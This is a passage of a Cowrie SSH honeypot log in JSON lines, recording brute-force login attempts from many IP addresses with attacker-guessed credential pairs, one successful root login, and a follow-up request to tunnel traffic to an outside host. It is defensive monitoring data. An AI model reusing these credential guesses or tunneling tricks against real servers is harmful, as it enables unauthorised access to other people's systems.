{"eventid":"cowrie.login.failed","username":"http","password":"1","message":"login attempt [http/1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:29:17.564703Z","src_ip":"182.18.161.165","session":"7790cc2ef547"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:29:18.825249Z","src_ip":"182.18.161.165","session":"7790cc2ef547"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":50604,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6ca6d44393","protocol":"ssh","message":"New connection: 93.113.63.124:50604 (1.2.3.4:22) [session: 0f6ca6d44393]","sensor":"my-vps","timestamp":"2025-09-08T23:29:25.780456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:29:25.782746Z","src_ip":"93.113.63.124","session":"0f6ca6d44393"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:29:25.841076Z","src_ip":"93.113.63.124","session":"0f6ca6d44393"}
{"eventid":"cowrie.login.failed","username":"access","password":"changeme","message":"login attempt [access/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:29:26.155861Z","src_ip":"93.113.63.124","session":"0f6ca6d44393"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:29:27.250271Z","src_ip":"93.113.63.124","session":"0f6ca6d44393"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":50594,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ca8dfc6f473","protocol":"ssh","message":"New connection: 45.150.34.92:50594 (1.2.3.4:22) [session: 9ca8dfc6f473]","sensor":"my-vps","timestamp":"2025-09-08T23:29:53.478271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:29:53.479387Z","src_ip":"45.150.34.92","session":"9ca8dfc6f473"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:29:53.496773Z","src_ip":"45.150.34.92","session":"9ca8dfc6f473"}
{"eventid":"cowrie.login.failed","username":"redis","password":"Password123","message":"login attempt [redis/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:29:53.607976Z","src_ip":"45.150.34.92","session":"9ca8dfc6f473"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:29:54.627893Z","src_ip":"45.150.34.92","session":"9ca8dfc6f473"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59942,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b4172f764ef","protocol":"ssh","message":"New connection: 212.227.235.229:59942 (1.2.3.4:22) [session: 9b4172f764ef]","sensor":"my-vps","timestamp":"2025-09-08T23:29:57.207608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:29:57.208408Z","src_ip":"212.227.235.229","session":"9b4172f764ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:29:57.346581Z","src_ip":"212.227.235.229","session":"9b4172f764ef"}
{"eventid":"cowrie.login.failed","username":"a","password":"123","message":"login attempt [a/123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:29:57.926288Z","src_ip":"212.227.235.229","session":"9b4172f764ef"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:29:59.069405Z","src_ip":"212.227.235.229","session":"9b4172f764ef"}
{"eventid":"cowrie.session.connect","src_ip":"31.14.32.7","src_port":53410,"dst_ip":"1.2.3.4","dst_port":22,"session":"b212920ca138","protocol":"ssh","message":"New connection: 31.14.32.7:53410 (1.2.3.4:22) [session: b212920ca138]","sensor":"my-vps","timestamp":"2025-09-08T23:30:02.206781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:30:02.207883Z","src_ip":"31.14.32.7","session":"b212920ca138"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-09-08T23:30:02.227792Z","src_ip":"31.14.32.7","session":"b212920ca138"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:30:02.249346Z","src_ip":"31.14.32.7","session":"b212920ca138"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42800,"dst_ip":"1.2.3.4","dst_port":22,"session":"b142ca1f19ac","protocol":"ssh","message":"New connection: 212.227.235.229:42800 (1.2.3.4:22) [session: b142ca1f19ac]","sensor":"my-vps","timestamp":"2025-09-08T23:30:11.780892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:30:11.781548Z","src_ip":"212.227.235.229","session":"b142ca1f19ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:30:12.088127Z","src_ip":"212.227.235.229","session":"b142ca1f19ac"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"ftpadmin123","message":"login attempt [ftpadmin/ftpadmin123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:30:13.816216Z","src_ip":"212.227.235.229","session":"b142ca1f19ac"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:30:15.125051Z","src_ip":"212.227.235.229","session":"b142ca1f19ac"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:30:20.640815Z","src_ip":"14.103.117.116","session":"403c8c7ed533"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":46150,"dst_ip":"1.2.3.4","dst_port":22,"session":"11ec460efddc","protocol":"ssh","message":"New connection: 46.101.8.63:46150 (1.2.3.4:22) [session: 11ec460efddc]","sensor":"my-vps","timestamp":"2025-09-08T23:30:54.574586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:30:54.575660Z","src_ip":"46.101.8.63","session":"11ec460efddc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:30:54.598431Z","src_ip":"46.101.8.63","session":"11ec460efddc"}
{"eventid":"cowrie.login.failed","username":"hduser","password":"Password","message":"login attempt [hduser/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T23:30:54.729586Z","src_ip":"46.101.8.63","session":"11ec460efddc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:30:55.755902Z","src_ip":"46.101.8.63","session":"11ec460efddc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3846,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cf6164da03c","protocol":"ssh","message":"New connection: 212.227.235.229:3846 (1.2.3.4:22) [session: 1cf6164da03c]","sensor":"my-vps","timestamp":"2025-09-08T23:30:56.468306Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:30:56.469772Z","src_ip":"212.227.235.229","session":"1cf6164da03c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":4145,"dst_ip":"1.2.3.4","dst_port":22,"session":"d58a2f702b49","protocol":"ssh","message":"New connection: 212.227.235.229:4145 (1.2.3.4:22) [session: d58a2f702b49]","sensor":"my-vps","timestamp":"2025-09-08T23:30:56.602705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:30:56.603695Z","src_ip":"212.227.235.229","session":"d58a2f702b49"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T23:30:56.737393Z","src_ip":"212.227.235.229","session":"d58a2f702b49"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":50516,"dst_ip":"1.2.3.4","dst_port":22,"session":"55ea5a52364f","protocol":"ssh","message":"New connection: 3.131.215.38:50516 (1.2.3.4:22) [session: 55ea5a52364f]","sensor":"my-vps","timestamp":"2025-09-08T23:30:57.002396Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xabh\\xd2\\xdfc\u0000s\\xd0\u001a:na\\x9e\\x83Y\u001a\\xddf\\x96+\u0000\\xc1\\xfa.\\x81\\xb0W1\\x8e\\xe6r\u0019\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xabh\\xd2\\xdfc\u0000s\\xd0\u001a:na\\x9e\\x83Y\u001a\\xddf\\x96+\u0000\\xc1\\xfa.\\x81\\xb0W1\\x8e\\xe6r\u0019\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-08T23:30:57.004073Z","src_ip":"3.131.215.38","session":"55ea5a52364f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:30:57.004934Z","src_ip":"3.131.215.38","session":"55ea5a52364f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:30:57.139577Z","src_ip":"212.227.235.229","session":"d58a2f702b49"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T23:30:57.274386Z","session":"d58a2f702b49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44368,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbb5d01f0850","protocol":"ssh","message":"New connection: 212.227.235.229:44368 (1.2.3.4:22) [session: fbb5d01f0850]","sensor":"my-vps","timestamp":"2025-09-08T23:31:09.062586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:31:09.063340Z","src_ip":"212.227.235.229","session":"fbb5d01f0850"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:31:09.196138Z","src_ip":"212.227.235.229","session":"fbb5d01f0850"}
{"eventid":"cowrie.login.failed","username":"builder","password":"111","message":"login attempt [builder/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:31:09.770653Z","src_ip":"212.227.235.229","session":"fbb5d01f0850"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:10.905839Z","src_ip":"212.227.235.229","session":"fbb5d01f0850"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:31.607204Z","src_ip":"212.227.235.229","session":"5d19ad8bd5a3"}
{"eventid":"cowrie.session.closed","duration":180.2314248085022,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:31.612200Z","src_ip":"212.227.235.229","session":"5d19ad8bd5a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49226,"dst_ip":"1.2.3.4","dst_port":22,"session":"20f93e33f31c","protocol":"ssh","message":"New connection: 212.227.235.229:49226 (1.2.3.4:22) [session: 20f93e33f31c]","sensor":"my-vps","timestamp":"2025-09-08T23:31:38.879357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:31:38.879991Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":